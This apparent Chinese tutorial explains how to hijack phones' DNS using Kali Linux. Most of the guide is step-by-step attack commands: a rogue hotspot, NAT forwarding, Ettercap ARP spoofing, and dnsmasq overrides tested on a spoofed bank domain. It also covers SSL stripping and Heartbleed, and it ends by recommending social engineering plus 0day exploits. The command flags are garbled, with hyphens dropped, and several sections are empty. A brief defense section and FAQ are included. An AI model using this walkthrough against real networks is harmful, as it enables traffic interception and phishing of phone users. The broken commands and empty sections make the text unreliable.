kali 对手机的dns劫持

Kali对手机DNS劫持的详细分析与实践指南

DNS劫持技术

1 什么是DNS劫持？

DNS劫持（DNS Hijacking）是一种通过非法手段篡改域名解析过程的攻击方式，将用户访问的域名指向恶意服务器，攻击者可通过控制DNS响应或伪造DNS记录，实现流量劫持、钓鱼攻击等目的。

2 手机成为目标的原因

• 移动网络特性：公共WiFi、家庭路由器等环境存在安全漏洞
• 操作系统权限：安卓系统可轻松获取Root权限，iOS需越狱
• 用户感知延迟：移动端网络请求处理速度快，用户难以察觉异常

攻击原理与技术实现

1 核心攻击原理

2 关键技术详解

2.1 ARP欺骗（Arpscan）

通过伪造ARP响应包,将攻击者MAC地址绑定到网关IP，使手机误认为攻击者是合法网关。

2.2 DNS缓存投毒（dnsmasq）

篡改本地DNS服务器缓存,返回伪造的IP地址给手机客户端。

2.3 HTTPS绕过技术

• 使用SSL剥离攻击（SSL Strip）
• 构造自签名证书实施中间人攻击
• 利用Heartbleed等漏洞破解加密通信

Kali攻击工具箱

1 核心工具矩阵

2 环境搭建步骤

1. 更新软件源：aptget update && aptget upgrade
2. 安装依赖包：sudo aptget install dnsmasq hostapd
3. 配置网络接口：编辑/etc/network/interfaces启用监听模式
4. 创建CA证书：使用OpenSSL生成自签名根证书

实战攻击流程

1 环境准备阶段

# 启动伪WiFi热点（以hostapd为例）
sudo hostapd B /etc/hostapd/hostapd.conf
# 启用IP转发
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
# 配置iptables NAT规则
sudo iptables t nat A POSTROUTING o eth0 j MASQUERADE

2 ARP欺骗实施

# 使用Ettercap进行双向欺骗
sudo ettercap Tqi u[目标手机MAC] M arp:remote /[网关IP]/ // //

3 DNS劫持配置

# 修改dnsmasq配置文件
echo "address=/example.com/192.168.1.100" >> /etc/dnsmasq.conf
# 重启服务
sudo systemctl restart dnsmasq

4 效果验证方法

1. 手机访问被劫持域名（如bank.com）
2. 使用Wireshark捕获DNS查询包
3. 检查实际连接IP地址
4. 对比预期与实际响应内容差异

防御体系构建

1 手机端防护措施

2 网络层加固方案

• 部署WPA3企业级加密
• 启用802.1X认证机制
• 配置DNSSEC签名验证
• 部署入侵检测系统（Snort/Suricata）

常见问题与解答（FAQ）

Q1：如何检测手机是否遭受DNS劫持？

A：可通过以下方法验证：

1. 使用ping命令对比域名解析IP
2. 在浏览器开发者工具查看证书颁发机构
3. 安装DNS查询监控工具（如DNSCrypt）
4. 对比HTTPS连接的指纹哈希值

Q2：Kali攻击是否会被新型手机系统识别？

A：现代系统已具备多重防护：

• iOS 14+的私有WiFi地址机制
• Android 11+的CAPTIVE_PORTAL检测
• TLS1.3的证书锁定特性
• 系统级DNS over HTTPS（DoH）支持
  建议结合社会工程学与0day漏洞实施高级攻击